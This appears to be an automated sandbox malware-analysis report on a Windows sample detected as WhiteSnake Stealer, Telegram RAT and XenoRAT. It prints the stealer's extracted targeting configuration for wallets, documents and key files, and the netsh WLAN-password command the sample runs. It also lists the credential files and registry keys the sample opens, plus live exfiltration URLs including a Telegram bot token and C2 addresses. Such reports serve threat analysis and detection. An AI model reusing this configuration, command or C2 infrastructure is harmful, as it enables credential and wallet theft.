name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
                      Source: 0LpFv1haTA.exe, 00000000.00000002.2105344056.0000019459C0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eoihofec</string></args></command><command name="3"><args><string>Phantom</string><string>bfnaelmomeimhlpmgjnjophhpkkoljpa</string></args></command><command name="0"><args><string>%UserProfile%\Desktop</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Desktop Files</string></args></command><command name="0"><args><string>%UserProfile%\Documents</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Documents</string></args></command><command name="0"><args><string>%UserProfile%\Downloads</string><string>doc.*;docx.*;xls.*;xlsx.*;ppt.*;pptx.*;pdf.*;txt.*;rtf.*;odt.*;ods.*;odp.*;csv.*;html.*;htm.*;epub.*;md.*;tex.*;wpd.*;wps.*;pub.*;xps.*;odg.*;ott.*;ots.*;otp.*;msg.*;eml.*;crt.*;cer.*;pem.*;der.*;p7b.*;p7c.*;pfx.*;p12.*;sst.*;csr.*;key.*;private.*;sig.*;signature.*;p7s.*;asc.*;gpg.*;authenticode.*;kdb.*;kdbx.*;agilekeychain.*;opvault.*;lastpass.*;psafe3.*;ovpn.*;log.*;cfg.*;conf.*;c.*;cpp.*;cc.*;cxx.*;hpp.*;cs.*;java.*;ts.*;php.*;rb.*;rs.*;swift.*;kt.*;kts.*;pl.*;r.*;sh.*;lua.*;py.*;go.*;</string><string>Grabber\Downloads</string></args></command><command name="6"/> </commands></Commands>g></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>*.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>*\*wallet*</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string>*</string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string>*</string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>*wallet*dat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\*.seco</string><string>Grabber\Wallets\Exodus</string></args></command><c
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal WLAN passwords
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara matchFile source: 00000007.00000002.4566779451.0000021F111E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
                      Yara detected WhiteSnake Stealer
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 1964, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 0LpFv1haTA.exe PID: 5500, type: MEMORYSTR
                      Yara detected XenoRAT
                      Source: Yara matchFile source: 41.0.manager.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000029.00000000.2648249695.0000000000242000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: manager.exe PID: 8056, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\manager.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Command and Scripting Interpreter                      		1
                      Scheduled Task/Job                      		11
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Credentials in Registry                      		134
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		11
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		Logon Script (Windows)1
                      Scheduled Task/Job                      		2
                      Obfuscated Files or Information                      		Security Account Manager1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Email Collection                      		21
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing                      		NTDS441
                      Security Software Discovery                      		Distributed Component Object Model1
                      Clipboard Data                      		11
                      Non-Standard Port                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets1
                      Process Discovery                      		SSHKeylogging3
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials261
                      Virtualization/Sandbox Evasion                      		VNCGUI Input Capture114
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Masquerading                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520806 Sample: 0LpFv1haTA.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 105 api.telegram.org 2->105 107 serveo.net 2->107 109 ip-api.com 2->109 121 Suricata IDS alerts for network traffic 2->121 123 Found malware configuration 2->123 125 Antivirus / Scanner detection for submitted sample 2->125 129 16 other signatures 2->129 12 0LpFv1haTA.exe 7 2->12         started        16 0LpFv1haTA.exe 2->16         started        18 0LpFv1haTA.exe 2->18         started        20 4 other processes 2->20 signatures3 127 Uses the Telegram API (likely for C&C communication) 105->127 process4 file5 99 C:\Users\user\AppData\...\0LpFv1haTA.exe, PE32 12->99 dropped 101 C:\Users\...\0LpFv1haTA.exe:Zone.Identifier, ASCII 12->101 dropped 103 C:\Users\user\AppData\...\0LpFv1haTA.exe.log, CSV 12->103 dropped 155 Found many strings related to Crypto-Wallets (likely being stolen) 12->155 157 Self deletion via cmd or bat file 12->157 22 cmd.exe 1 12->22         started        159 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->159 161 Tries to steal Mail credentials (via file / registry access) 16->161 163 Tries to harvest and steal browser information (history, passwords, etc) 16->163 165 Tries to harvest and steal WLAN passwords 16->165 25 cmd.exe 16->25         started        27 WerFault.exe 16->27         started        30 cmd.exe 16->30         started        32 ssh.exe 16->32         started        signatures6 process7 file8 143 Uses schtasks.exe or at.exe to add and modify task schedules 22->143 145 Uses netsh to modify the Windows network and firewall settings 22->145 147 Tries to harvest and steal WLAN passwords 22->147 34 0LpFv1haTA.exe 14 30 22->34         started        39 conhost.exe 22->39         started        41 timeout.exe 1 22->41         started        49 2 other processes 22->49 43 conhost.exe 25->43         started        45 chcp.com 25->45         started        51 2 other processes 25->51 97 C:\ProgramData\Microsoft\...\Report.wer, Unicode 27->97 dropped 53 4 other processes 30->53 47 conhost.exe 32->47         started        signatures9 process10 dnsIp11 111 188.120.242.78, 49739, 8817 THEFIRST-ASRU Russian Federation 34->111 113 api.telegram.org 149.154.167.220, 443, 49712, 49713 TELEGRAMRU United Kingdom 34->113 115 7 other IPs or domains 34->115 91 C:\Users\user\AppData\Roaming\manager.exe, PE32 34->91 dropped 131 Antivirus detection for dropped file 34->131 133 Multi AV Scanner detection for dropped file 34->133 135 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 34->135 137 6 other signatures 34->137 55 manager.exe 34->55         started        59 cmd.exe 34->59         started        61 cmd.exe 34->61         started        63 ssh.exe 34->63         started        file12 signatures13 process14 dnsIp15 95 C:\Users\user\AppData\Roaming\...\manager.exe, PE32 55->95 dropped 149 Multi AV Scanner detection for dropped file 55->149 151 Machine Learning detection for dropped file 55->151 66 manager.exe 55->66         started        153 Tries to harvest and steal WLAN passwords 59->153 71 conhost.exe 59->71         started        73 chcp.com 59->73         started        75 netsh.exe 59->75         started        77 findstr.exe 59->77         started        79 conhost.exe 61->79         started        81 chcp.com 61->81         started        85 2 other processes 61->85 119 serveo.net 138.68.79.95, 22, 49707, 49710 DIGITALOCEAN-ASNUS United States 63->119 83 conhost.exe 63->83         started        file16 signatures17 process18 dnsIp19 117 193.149.187.135, 4444, 49744, 49747 DANISCODK Denmark 66->117 93 C:\Users\user\AppData\Local\...\tmp4A67.tmp, ASCII 66->93 dropped 139 Multi AV Scanner detection for dropped file 66->139 141 Machine Learning detection for dropped file 66->141 87 schtasks.exe 66->87         started        file20 signatures21 process22 process23 89 conhost.exe 87->89         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      0LpFv1haTA.exe82%ReversingLabsWin32.Trojan.Mardom
                      0LpFv1haTA.exe100%AviraTR/Dropper.Gen
                      0LpFv1haTA.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe100%AviraTR/Dropper.Gen
                      C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\XenoManager\manager.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\manager.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe82%ReversingLabsWin32.Trojan.Mardom
                      C:\Users\user\AppData\Roaming\XenoManager\manager.exe92%ReversingLabsByteCode-MSIL.Trojan.XenoRat
                      C:\Users\user\AppData\Roaming\manager.exe92%ReversingLabsByteCode-MSIL.Trojan.XenoRat

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                      http://upx.sf.net0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      serveo.net
                      		138.68.79.95
                      		truefalse
                        		unknown
                        ip-api.com
                        		208.95.112.1
                        		truefalse
                          		unknown
                          api.telegram.org
                          		149.154.167.220
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%23Heartbeat%20received%20from%20beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EServing%20on%3A%3C%2Fb%3E%20%3Ci%3Ehttps%3A%2F%2F8f7482867cc6a5aec99ead5e72d7016e.serveo.net%3C%2Fi%3E%0A%0A&parse_mode=HTMLtrue
                              		unknown
                              http://ip-api.com/line?fields=query,countryfalse
                                		unknown
                                https://api.telegram.org/bot7935489665:AAE2XyOo-0CSgW-NXoz80QphaaOkmebwR5Q/sendMessage?chat_id=-4578472389&text=%23MSWINDOW%20%20%23Beacon%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E051829%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.13Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F188.120.242.78%3A8817%2Fget%2FJfGGV6ePde%2F9IYTn_user%40051829_report.wsr%22%7D%5D%5D%7D&parse_mode=HTMLtrue
                                  		unknown
                                  http://185.253.7.60:8080//sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ==true
                                    		unknown
                                    http://185.253.7.60:8080//mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AEtrue
